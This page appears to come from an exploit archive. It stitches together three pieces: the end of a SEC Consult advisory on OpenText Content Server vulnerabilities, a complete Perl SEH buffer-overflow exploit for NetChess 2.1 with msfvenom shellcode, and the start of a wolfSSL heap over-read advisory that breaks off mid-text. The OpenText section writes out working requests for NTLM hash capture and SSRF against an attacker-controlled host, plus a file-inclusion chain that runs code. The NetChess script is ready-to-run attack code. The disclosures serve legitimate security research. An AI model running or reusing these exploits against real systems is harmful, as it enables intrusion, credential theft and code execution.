xmlExport multiple vulnerabilities (CVE-2022-45925)<br />3.1) Information disclosure<br />Sending the following request reveals sensitive information about the<br />request:<br /><br />-------------------------------------------------------------------------------<br />GET /OTCS//cs.exe?func=ll&objAction=xmlexport&requestContext=T&objId=2004 HTTP/1.1<br />Host: opentext-dev<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: LLCookie=Ztn...<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Type: application/xml<br />Server: Microsoft-IIS/10.0<br />X-Powered-By: ASP.NET<br />Date: Sat, 01 Oct 2022 16:13:40 GMT<br />Connection: close<br />Content-Length: 12581<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><livelink Acls='false' appversion='16.2.0' AttributeInfo='false' CallbackHandlerName='{''}' ContentInline='false' DoingImport='false' ExtUserInfo='false' FollowAliases='false' ForImport='false' <br />HandlerName='XmlExport' NodeInfo='false' Permissions='false' Schema='false' Scope='one' src='XmlExport'><br /> <context><br /> <user deleted='0' groupid='999' groupname='[Content Server Administration]' groupownerid='1000' grouptype='11' id='1000' name='Admin' ownerid='1000' spaceid='0' type='0' userprivileges='16777215'/><br /> <cgi auth_type='' content_length='0' content_type='' path_info='' query_string='func=ll&objAction=xmlexport&requestContext=T&objId=2004' remote_addr='$IP' remote_host='$IP' remote_user='' <br />request_method='GET' script_name='/OTCS/cs.exe' server_name='opentext-dev' server_port='80' server_protocol='HTTP/1.1'/><br /> <http><br /> <header name='HTTP_ACCEPT' value='text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'/><br /> <header name='HTTP_ACCEPT_ENCODING' value='gzip, deflate'/><br /> <header name='HTTP_ACCEPT_LANGUAGE' value='en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3'/><br /> <header name='HTTP_CONNECTION' value='close'/><br /> <header name='HTTP_HOST' value='opentext-dev'/><br /> <header name='HTTP_UPGRADE_INSECURE_REQUESTS' value='1'/><br /> <header name='HTTP_USER_AGENT' value='Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0'/><br /> </http><br /> </context><br />-------------------------------------------------------------------------------<br /><br />3.2) Capture of NTLM hashes<br />Sending the following request with a remote path as value for the<br />`stylesheet` parameter initiates a SMB connection to the attacker's machine:<br /><br />-------------------------------------------------------------------------------<br />GET /OTCS//cs.exe?func=ll&&objId=50469&objAction=xmlexport&transform=T&stylesheet=//$attackerIP/msg.txt<br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br />$ sudo impacket-smbserver test /tmp -smb2support<br />Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation<br /><br />[*] Config file parsed<br />[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0<br />[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0<br />[*] Config file parsed<br />[*] Config file parsed<br />[*] Config file parsed<br />[*] Incoming connection ($opentextIP,59639)<br />[*] AUTHENTICATE_MESSAGE (\,DESKTOP-XXX)<br />[*] User DESKTOP-XXX\ authenticated successfully<br />[*] :::00::aaaaaaaaaaaaaaaa<br /><br />-------------------------------------------------------------------------------<br /><br />Important side effect:<br /><br />Specifying an existing file for the `stylesheet` parameter , which is not a<br />valid stylesheet, results in an error. As this error skips the cleanup code the<br />temporary file `$OTCS_HOME\temp\xml\XslOutput_[digit]_[digit]` is not removed.<br />The content of this file is partially controlled by the attacker, as it<br />contains the filename of the exported object. This could be further exploited<br />as documented in vulnerability 5).<br /><br />-------------------------------------------------------------------------------<br /><?xml version="1.0" encoding="UTF-8"?><br /><br /><br /> **OBJECT NAME**<br />-------------------------------------------------------------------------------<br /><br /><br />4) Evaluate webreports via notify.localizeEmailTemplate (CVE-2022-45926)<br />Sending the following request with the webreport source in the `msgBody`<br />parameter allows the user to evaluate a webreport.<br /><br />-------------------------------------------------------------------------------<br />POST /OTCS/cs.exe HTTP/1.1<br />Host: opentext-dev<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Connection: close<br />Cookie: LLCookie=zBH4...<br />Origin: http://opentext-dev<br />Connection: close<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 134<br /><br />func=notify.localizeEmailTemplate&language=_en_US&arg=5&msgBody=<@urlencode>Username: [LL_REPTAG_USERNAME /]<@/urlencode>&fetch=foobar<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Content-Type: text/plain ;charset=UTF-8<br />Server: Microsoft-IIS/10.0<br />X-Powered-By: ASP.NET<br />Date: Sat, 01 Oct 2022 18:33:29 GMT<br />Connection: close<br />Content-Length: 19<br /><br />Username: Admin<br />-------------------------------------------------------------------------------<br /><br />The tag `LL_WEBREPORT_RESTCLIENT` can be used to perform a<br />`Server Side Request Forgery (SSRF)` attack, with nearly full control of the<br />actual request.<br /><br />-------------------------------------------------------------------------------<br />POST /OTCS/cs.exe HTTP/1.1<br />Host: opentext-dev<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Connection: close<br />Cookie: LLCookie=hRj<br />Origin: http://opentext-dev<br />Connection: close<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 347<br /><br />func=notify.localizeEmailTemplate&language=_en_US&arg=5&msgBody=<@urlencode> <br />[LL_WEBREPORT_RESTCLIENT @URI:"http://$attackerIP/" @METHOD:GET @RESPONSE:resp @HOST:$attackerIP @PORT:80 /]<br /><@/urlencode>&fetch=<@urlencode>LL_WEB [ /] [LL_REPTAG_EOL /] LL_WEB_END<@/urlencode><br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br />$ ncat -v -l 80<br />Ncat: Version 7.92 ( https://nmap.org/ncat )<br />Ncat: Listening on :::80<br />Ncat: Listening on 0.0.0.0:80<br />Ncat: Connection from $IP.<br />Ncat: Connection from $IP:59856.<br />GET http://$attackerIP/ HTTP/1.1<br />Connection: Keep-Alive<br />Host: $attackerIP<br />User-Agent: Poco<br />Accept: */*<br /><br />-------------------------------------------------------------------------------<br /><br />Other dangerous tags could be `RUNSHELL`, `LL_FETCHURL` and `LL_WEBREPORT_CALL`<br /><br />The tag `LL_WEBREPORT_RESTCLIENT` is disabled by default in version 22.1.<br /><br /><br />5) Local File Inclusion allows Oscript execution (CVE-2022-45928)<br />One way to create a file on the server's filesystem with the desired `Oscript`<br />code, is to use the vulnerability `3.2` and its side effect:<br /><br />* Create a file<br />* Set the filename to the `Oscript` code, which should be executed (e.g.:<br /> ``fArgs content: `.fArgs` ``)<br />* Run the `xmlExport` action with an invalid `stylesheet` (should be done<br /> multiple times to increase the hit change for the `LFI`)<br /><br />The temporary file `XslOutput_2_3` has the following content:<br />-------------------------------------------------------------------------------<br /><?xml version="1.0" encoding="UTF-8"?><br /><br /><br /> fArgs content: `.fArgs`<br />-------------------------------------------------------------------------------<br /><br /><br />To include the previously created file and execute its `Oscript` code, the<br />following request can be used.<br /><br />-------------------------------------------------------------------------------<br />GET /OTCS/cs.exe?func=commdirectory.LookFeel&objid=49259&menutype=375&htmlFile=temp/xml/XslOutput_2_3 HTTP/1.1<br />Host: opentext-dev<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: <br />LLCookie=gYkU6%2BmrbXPaZ87US9mHOswpXTZTyMujb3DmwyB8QglNf9TnicUFBS2%2BW2xv2rufPoyGb82bn3VuyMwvDckJpuncAOHxuIeTbPce%2B6RSn035HjDkk5b2b0rZyM%2FzbtIquS3bYOetho6kt3RYhvkl2ahLkHvhGtO6KUp%2BMX%2Fe43yTpBcw5g1umg%3D%3D; <br />LLTZCookie=0; BrowseSettings=rm%2BT2O%2F0LEfyVN4tBpAlz8iw6wjD9YgjYihWC2sGyHOayyH0F8hfiQ%3D%3D; <br />AdminPwd=CV6waXr6yPLjlL2OlABJf4ka0kmITRSOHWyZSpzRdfy0SvueX0YM%2B6KFPopV5ebviGckgD6K24tGD7HXiJ18UhvZQBS%2BBYSlBI%2BzI0JCeGSH76MxvN%2BogDT59s6MIHVP4PAqqL1YzQ9cRN4L6eZbdE2hySDTwUQTQlOrSoxJNS28IQMclNUnsgct11cbQgApGWazgFlph4brLk65xEfi%2BN%2FGs9rSEKAehMwc94MvoFZ%2B5LLOurbgZYCLaA0YIWuHIUdppEsBVmQKjYGsjyS%2BNcEvcuuiCm8g6C%2FtRIUl85i%2BGyNeFi1rAA%3D%3D; <br />TargetBrowseObjID=0; TargetBrowseObjType=150; tl=public_timeline; Accordion=<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: text/html;charset=UTF-8<br />Server: Microsoft-IIS/10.0<br />X-Frame-Options: SAMEORIGIN<br />Content-Security-Policy: frame-ancestors 'self'<br />X-UA-Compatible: IE=edge<br />Set-Cookie: <br />LLCookie=P7RTINkymKF2z1S8RQ6i0mjQKzaOb%2F2KNgFT5C2uBJZCgJ3sZ36Tll6LMvFDy3MC9DpjK00EXcIAROS7BHPtiMQTUqZ%2FVc6UtBXlW1%2FCljp1jDh1%2BUM05PJDhWzz1Xjzqnuw1iyIiCVDRBpgG9ztKGjSYngYLx6663COmbGleiMRgDlyufNcYw%3D%3D; <br />path=/OTCS/; httponly<br />X-Powered-By: ASP.NET<br />Date: Sun, 02 Oct 2022 10:37:09 GMT<br />Connection: close<br />Content-Length: 5762<br /><br /><!DOCTYPE html><br /><HTML LANG="en-US"><br /><!-- ..... --><br /></HEAD><br /><br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><br /><br />fArgs content: <br />R<'_ExtendSessionTimeout'=true,'_REQUEST'='llweb','AUTH_TYPE'='','CONTENT_LENGTH'='0','CONTENT_TYPE'='','func'='commdirectory.LookFeel','GATEWAY_INTERFACE'='CGI/1.1','htmlFile'='temp/xml/XslOutput_2_3','HTTP_ACCEPT'='text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','HTTP_ACCEPT_ENCODING'='gzip, <br />deflate','HTTP_ACCEPT_LANGUAGE'='en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3','HTTP_CONNECTION'='close','HTTP_COOKIE'='LLTZCookie=0; <br />BrowseSettings=uUS1%2FZ5g1c0XS4%2FNRpsSf2m14UItUrVHPWaVbvGjfcio6cpCyC5KPA%3D%3D; <br />AdminPwd=6GxYwSEETjgXlHwOyzNue7sSkSKHieE2XNh7qe6h1MxuNNd3GlbD7NqlcaouTXLJvE84KXliXoS3rv0OEAoPMjLs%2B5navCaRtW32FuEYDhEtcTAetQzTUyEMJk8gtywZrslSilkjG%2FZjMh0S5nNi2MmkzquGi2BsKuKaN3dMGjscqQErAY9aIxAx1r%2FE7Gdsx1Vdo5SdILV2VdgVtjuMP3ul7RBYvHL1OsV4MtPjhB7s%2Flv6TXzrTUMzv3J%2BiVRxmXhxb%2BzFIAu7zE4DckTnGYE3tTP%2Fg1qL0GKrxVuBJbQIaZPyotwqSA%3D%3D; <br />TargetBrowseObjID=0; TargetBrowseObjType=150; <br />LLCookie=gYjACLksaCQXFyPM6bXgZFWxLST0MIVxqrqP9KwByUPbF8bVCKwyShPhoC0iRNqSytsqY1YfoW6i7DE39j7RpfjB4XnTw36lAps80xrs9nDkSqy1rDYqUsdbsHHJFSWCV5IzVVrS%2FuvrWBvv4e0HcYVpbbeXAI4%2BTWhmSWqDIvD68rCVqrrvRQ%3D%3D; <br />tl=public_timeline; Accordion=','HTTP_HOST'='opentext-dev','HTTP_UPGRADE_INSECURE_REQUESTS'='1','HTTP_USER_AGENT'='Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 <br />Firefox/102.0','HTTPS'='off','HTTPS_KEYSIZE'='','HTTPS_SECRETKEYSIZE'='','HTTPS_SERVER_ISSUER'='','HTTPS_SERVER_SUBJECT'='','LLENVIRON_ASSOC'=A<1,?,'AUTH_TYPE'='','CONTENT_LENGTH'='0','CONTENT_TYPE'='','GATEWAY_INTERFACE'='CGI/1.1','HTTP_ACCEPT'='text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','HTTP_ACCEPT_ENCODING'='gzip, <br />deflate','HTTP_ACCEPT_LANGUAGE'='en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3','HTTP_CONNECTION'='close','HTTP_COOKIE'='LLTZCookie=0; <br />BrowseSettings=uUS1%2FZ5g1c0XS4%2FNRpsSf2m14UItUrVHPWaVbvGjfcio6cpCyC5KPA%3D%3D; <br />AdminPwd=6GxYwSEETjgXlHwOyzNue7sSkSKHieE2XNh7qe6h1MxuNNd3GlbD7NqlcaouTXLJvE84KXliXoS3rv0OEAoPMjLs%2B5navCaRtW32FuEYDhEtcTAetQzTUyEMJk8gtywZrslSilkjG%2FZjMh0S5nNi2MmkzquGi2BsKuKaN3dMGjscqQErAY9aIxAx1r%2FE7Gdsx1Vdo5SdILV2VdgVtjuMP3ul7RBYvHL1OsV4MtPjhB7s%2Flv6TXzrTUMzv3J%2BiVRxmXhxb%2BzFIAu7zE4DckTnGYE3tTP%2Fg1qL0GKrxVuBJbQIaZPyotwqSA%3D%3D; <br />TargetBrowseObjID=0; TargetBrowseObjType=150; <br />LLCookie=gYjACLksaCQXFyPM6bXgZFWxLST0MIVxqrqP9KwByUPbF8bVCKwyShPhoC0iRNqSytsqY1YfoW6i7DE39j7RpfjB4XnTw36lAps80xrs9nDkSqy1rDYqUsdbsHHJFSWCV5IzVVrS%2FuvrWBvv4e0HcYVpbbeXAI4%2BTWhmSWqDIvD68rCVqrrvRQ%3D%3D; <br />tl=public_timeline; Accordion=','HTTP_HOST'='opentext-dev','HTTP_UPGRADE_INSECURE_REQUESTS'='1','HTTP_USER_AGENT'='Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 <br />Firefox/102.0','HTTPS'='off','HTTPS_KEYSIZE'='','HTTPS_SECRETKEYSIZE'='','HTTPS_SERVER_ISSUER'='','HTTPS_SERVER_SUBJECT'='','PATH_INFO'='','PATH_TRANSLATED'='C:\\inetpub\\wwwroot','QUERY_STRING'='func=commdirectory.LookFeel&objid=49259&menutype=375&htmlFile=temp/xml/XslOutput_2_3','REMOTE_ADDR'='$IP','REMOTE_HOST'='$IP','REMOTE_USER'='','REQUEST_METHOD'='GET','SCRIPT_NAME'='/OTCS/cs.exe','SERVER_NAME'='opentext-dev','SERVER_PORT'='80','SERVER_PROTOCOL'='HTTP/1.1','SERVER_SOFTWARE'='Microsoft-IIS/10.0'>,'LLPARAMS_LIST'=\{\{'func','commdirectory.LookFeel'},{'objid','49259'},{'menutype','375'},{'htmlFile','temp/xml/XslOutput_2_3'}},'LLSYSPARAMS_ASSOC'=A<1,?,'_uploadFilenames'={},'_uploadPath'='C:\\Windows\\TEMP\\'>,'menutype'=375,'objid'=49259,'PATH_INFO'='','PATH_TRANSLATED'='C:\\inetpub\\wwwroot','QUERY_STRING'='func=commdirectory.LookFeel&objid=49259&menutype=375&htmlFile=temp/xml/XslOutput_2_3','REMOTE_ADDR'='$IP','REMOTE_HOST'='$IP','REMOTE_USER'='','REQUEST_ID'='8f325fa0-7d39-42a7-bf8f-486cbcbf1042','REQUEST_METHOD'='GET','REQUEST_PROCESSING_DURATION'='0','SCRIPT_NAME'='/OTCS/cs.exe','SERVER_NAME'='opentext-dev','SERVER_PORT'='80','SERVER_PROTOCOL'='HTTP/1.1','SERVER_SOFTWARE'='Microsoft-IIS/10.0','cdid'=0,'prgCtx'=#323b0f9,'TZOffset'=0><br /><br /></HTML><br />-------------------------------------------------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested:<br />* 22.1 (16.2.19.1803)<br /><br />The following versions are vulnerable according to the vendor:<br />* CVE-2022-45924: 20.4 - 22.3<br />* CVE-2022-45922: 21.1 - 22.1<br />* CVE-2022-45925: 16.2.2 - 22.3<br />* CVE-2022-45926: 20.4 - 22.3<br />* CVE-2022-45928: 16.2.2 - 22.3<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-07: Vendor contacted via security@opentext.com<br />2022-10-07: Vendor acknowledged the email and is reviewing the reports<br />2022-11-18: Vendor confirms all vulnerabilities and is working on a patch aimed to<br /> be released in November<br />2022-11-24: Vendor delays the patch "few days/weeks into December"<br />2022-11-25: Requesting CVE numbers (Mitre)<br />2022-12-15: Vendor delays the patch and provides a release date: January 16th 2023<br />2023-01-17: Public release of security advisory<br /><br /><br />Solution:<br />---------<br />Upgrade to at least version 22.4 or apply hotfixes which can be downloaded at<br />the vendor's page:<br />https://support.opentext.com/csm?id=kb_article_view&sysparm_article=KB0781429<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Armin Stock / @2023<br /><br /></code></pre>
<pre><code># Exploit Title: NetChess2.1 Buffer Overflow (SEH)<br /># Date: 8/1/2022<br /># Exploit Author: Ugur Eminli<br /># Vendor Homepage: https://sourceforge.net/projects/avmnetchess/<br /># Software Link: https://sourceforge.net/projects/avmnetchess/<br /># Version: 2.1<br /># Tested on: WinXP SP2 Build 2600<br /><br />#!/usr/bin/perl<br /><br />my $file= "exploit.pgn";<br />my $junk= "\x41" x 336;<br /><br />#JMP short 6bytes<br />my $seh="\xeb\x06\xcc\xcc";<br /><br />#0x74d31567 : pop edi # pop esi # ret | {PAGE_EXECUTE_READ} [oledlg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.0 (C:\WINDOWS\system32\oledlg.dll)<br />my $nseh= "\x67\x15\xd3\x74";<br /><br />my $nop= "\x90" x 10;<br /><br />#bad chars: \x00\x0a\x1a\x2f\x3b\x3c\x3f\x25\x28\x21\x22\x23\x24\x5e\x7b\x2e\x5b\x5d<br /><br /># msfvenom -p windows/exec cmd=calc -e x86/alpha_upper -a x86 --platform windows -f pl -b "\x00\x0a\x1a\x2f\x3b\x3c\x3f\x25\x28\x21\x22\x23\x24\x5e\x7b\x2e\x5b\x5d" EXITFUNC=seh<br /><br />my $buf = <br />"\x89\xe7\xd9\xcc\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49\x49" .<br />"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .<br />"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .<br />"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .<br />"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d" .<br />"\x38\x4c\x42\x53\x30\x43\x30\x45\x50\x33\x50\x4c\x49\x4d" .<br />"\x35\x36\x51\x4f\x30\x35\x34\x4c\x4b\x56\x30\x30\x30\x4c" .<br />"\x4b\x56\x32\x44\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x34" .<br />"\x32\x47\x58\x54\x4f\x4e\x57\x31\x5a\x57\x56\x36\x51\x4b" .<br />"\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c\x44\x42\x56\x4c\x57" .<br />"\x50\x49\x51\x38\x4f\x44\x4d\x55\x51\x39\x57\x5a\x42\x5a" .<br />"\x52\x30\x52\x46\x37\x4c\x4b\x51\x42\x52\x30\x4c\x4b\x30" .<br />"\x4a\x57\x4c\x4c\x4b\x50\x4c\x34\x51\x53\x48\x4b\x53\x30" .<br />"\x48\x53\x31\x38\x51\x50\x51\x4c\x4b\x46\x39\x37\x50\x43" .<br />"\x31\x48\x53\x4c\x4b\x50\x49\x44\x58\x5a\x43\x47\x4a\x31" .<br />"\x59\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x46\x51\x4b" .<br />"\x4f\x4e\x4c\x49\x51\x38\x4f\x44\x4d\x55\x51\x39\x57\x30" .<br />"\x38\x4b\x50\x44\x35\x4c\x36\x55\x53\x53\x4d\x4a\x58\x47" .<br />"\x4b\x53\x4d\x57\x54\x43\x45\x4a\x44\x50\x58\x4c\x4b\x46" .<br />"\x38\x31\x34\x45\x51\x59\x43\x43\x56\x4c\x4b\x44\x4c\x50" .<br />"\x4b\x4c\x4b\x46\x38\x45\x4c\x33\x31\x39\x43\x4c\x4b\x45" .<br />"\x54\x4c\x4b\x45\x51\x58\x50\x4d\x59\x37\x34\x31\x34\x51" .<br />"\x34\x51\x4b\x31\x4b\x45\x31\x31\x49\x30\x5a\x50\x51\x4b" .<br />"\x4f\x4b\x50\x51\x4f\x51\x4f\x51\x4a\x4c\x4b\x34\x52\x4a" .<br />"\x4b\x4c\x4d\x31\x4d\x53\x5a\x45\x51\x4c\x4d\x4c\x45\x4e" .<br />"\x52\x55\x50\x45\x50\x33\x30\x56\x30\x45\x38\x36\x51\x4c" .<br />"\x4b\x32\x4f\x4d\x57\x4b\x4f\x58\x55\x4f\x4b\x4b\x4e\x44" .<br />"\x4e\x37\x42\x4b\x5a\x42\x48\x59\x36\x4a\x35\x4f\x4d\x4d" .<br />"\x4d\x4b\x4f\x49\x45\x47\x4c\x53\x36\x33\x4c\x44\x4a\x4d" .<br />"\x50\x4b\x4b\x4b\x50\x32\x55\x43\x35\x4f\x4b\x47\x37\x54" .<br />"\x53\x54\x32\x52\x4f\x32\x4a\x33\x30\x51\x43\x4b\x4f\x58" .<br />"\x55\x33\x53\x43\x51\x42\x4c\x55\x33\x45\x50\x41\x41";<br /><br /><br />open($FILE,">$file");<br />print $FILE "$junk$seh$nseh$nop$buf$nop";<br />close($FILE);<br />print "\r\n[+] Exploit File Created: $file \n";<br /></code></pre>
<pre><code># wolfSSL before 5.5.2: Heap-buffer over-read with WOLFSSL_CALLBACKS<br />====================================================================<br /><br />## INFO<br />=======<br /><br />The CVE project has assigned the id CVE-2022-42905 to this issue.<br /><br />Severity: 9.1 CRITICAL<br />Affected version: before 5.5.2<br />End of embargo: Ended October 28, 2022<br />Blog Post: https://blog.trailofbits.com/2023/01/12/wolfssl-vulnerabilities-tlspuffin-fuzzing-ssh/<br /><br />## SUMMARY<br />==========<br /><br />If wolfSSL callback functions are enabled (i.e., the flag `WOLFSSL_CALLBACKS` is<br />enabled), then a malicious client or network attacker can send a Client Hello<br />message to a server that when parsed by the server will trigger a buffer<br />over-read on the heap of at least 5 bytes. Similarly, a malicious server or a<br />network attacker can send a Hello Retry Request message to a client that when<br />parsed by the client will trigger a buffer over-read on the heap of at least 15<br />bytes.<br /><br />The `AddPacketInfo` is given a buffer that should be the input buffer and that<br />actually is shifted by 5 bytes on the left, i.e., instead of reading<br />`input[0]..input[length]`, the function will read `input[-5]..input[length]` and<br />store it in a buffer that is exposed through the wolfSSL API. Note that `input`<br />is stored on the heap and `input[-5]` to `input[-1]` might store sensitive data<br />that should not be given to `AddPacketInfo`, for example when callback functions<br />are used as logging facility (through the API functions `wolfSSL_accept_ex` and<br />`wolfSSL_connect_ex`).<br /><br />This buffer over-read can be triggered at a server with a single Client Hello<br />message. We have confirmed this with a proof-of-concept test case given below on<br />wolfSSL 5.5.0, on the version from the master branch, and on version 5.4.0. A<br />similar buffer over-read can be triggered at a client with the same wolfSSL<br />versions.<br /><br />## DETAILS<br />==========<br /><br />(Note: All code snippets and line numbers are with respect to the git hash<br />`#43715d1bb5b8c5b8b18cba4be3171fd1dd7eb046` on remote<br />`git@github.com:wolfssl/wolfssl.git`.)<br /><br />When executing the first proof of concept test case given below, we reach a call<br />to `DoTls13HandShakeMsgType` from `tls13.c:DoTls13HandShakeMsg:10443` when the<br />server parses the Client Hello message, with the following values:<br /><br />```c<br />size = 16520;<br />totalSz = 16524;<br />*inOutIdx = 4;<br />type = 1;<br />input; // buffer containing the input to be processed, before input,<br />there seems to be another input stored<br />```<br /><br />`*inOutIdx=4` because of the call to `GetHandshakeHeader` at line<br />`tls13.c:10411`.<br /><br />We enter the function `tls13.c:DoTls13HandShakeMsgType` and because<br />`WOLFSSL_CALLBACKS` flag is defined, we enter this snippet:<br /><br />```c<br />#if defined(WOLFSSL_CALLBACKS)<br />/* add name later, add on record and handshake header part back on */<br />if (ssl->toInfoOn) {<br />int add = RECORD_HEADER_SZ + HANDSHAKE_HEADER_SZ;<br />AddPacketInfo(ssl, 0, handshake, input + *inOutIdx - add,<br />size + add, READ_PROTO, ssl->heap);<br />AddLateRecordHeader(&ssl->curRL, &ssl->timeoutInfo);<br />}<br />#endif<br />```<br /><br />`tls13.c:DoTls13HandShakeMsgType:10094`<br /><br />We have that `RECORD_HEADER_SZ = 5` and `HANDSHAKE_HEADER_SZ = 4` so `add = 9`<br />while `*inOutIdx` is still set to `4`. Therefore, the pointer indicating the<br />beginning of the alleged input that is given to the `AddPacketInfo` function<br />(argument `data`) is `data = input + *inOutIdx - add = input - 5`. This buffer<br />starts 5 bytes before the actual input buffer. The argument `sz = size + add` is<br />the total length of the input, which is too long here `16529` instead of `16524`<br />bytes.<br /><br />It seems the snippet above makes a wrong assumption about the past increases of<br />`*inOutIdx`, which has not been increased by `RECORD_HEADER_SZ` as no record<br />header has been parsed yet.<br /><br />Next, in `internal.c:AddPacketInfo:25153`, see the snippet:<br /><br />```c<br />/* add data, put in buffer if bigger than static buffer */<br />info->packets[info->numberPackets].valueSz = sz;<br /><br />if (sz < MAX_VALUE_SZ)<br />XMEMCPY(info->packets[info->numberPackets].value, data, sz);<br />else {<br />info->packets[info->numberPackets].bufferValue = (byte*)XMALLOC(sz,<br />heap, DYNAMIC_TYPE_INFO);<br /><br />if (!info->packets[info->numberPackets].bufferValue)<br />/* let next alloc catch, just don't fill, not fatal here */<br />info->packets[info->numberPackets].valueSz = 0;<br />else<br />XMEMCPY(info->packets[info->numberPackets].bufferValue, data, sz);<br />}<br />```<br /><br />`internal.c:AddPacketInfo:25169`<br /><br />and recall that `sz = 16529`, `data = input - 5`. The last line will write<br />`input[-5]..input[16524]` into `info->packets[0]`. Recall that<br />`info->packets[0]` equals `ssl->timeoutInfo->packets[0]`.<br /><br />It turns out `ssl->timeoutInfo` and in particular the content of<br />`ssl->timeoutInfo->packets[0]` is exposed to the wolfSSL user through the<br />functions `wolfSSL_connect_ex` and `wolfSSL_accept_ex` whose declarations are as<br />follows (where `typedef int (*TimeoutCallBack)(TimeoutInfo*);` from `ssl.h`);<br />see also the<br />[wolfSSL documentation](https://www.wolfssl.com/documentation/manuals/wolfssl/chapter06.html).<br /><br />Therefore, in addition to the over-read per se, this might be exploited to<br />exfiltrate sensitive data, depending on the use case.<br /><br />## POTENTIAL EXPLOITATION<br />=========================<br /><br />We found no systematic exploit using this bug but it could be exploited in some<br />specific use cases. We note that this problem only occurs when<br />`WOLFSSL_CALLBACKS` is enabled, but we found no documentation forbidding the use<br />of this flag in production.<br /><br />For instance, a wolfSSL server could be configured to use the API function<br />`wolfSSL_connect_ex` with an argument `srvTimeoutCB`. This argument could be a<br />function that logs on disk the content of `timeoutInfo->packets` when the<br />incoming message has a packet name (packetName) "ClientHello". The rationale<br />being that logging Client Hello messages should not expose sensitive and secret<br />information on disk (assuming logs are not well-protected). Because of this bug,<br />the log will contain extra data from the heap that do not correspond to the<br />received Client Hello message and that could be sensitive data.<br /><br />Here is a threat model for which this could be a problem:<br /><br />- attacker has partial access to the architecture, for example log files (log<br />files could be stored at rest and because considered less sensitive, they are<br />less secured),<br 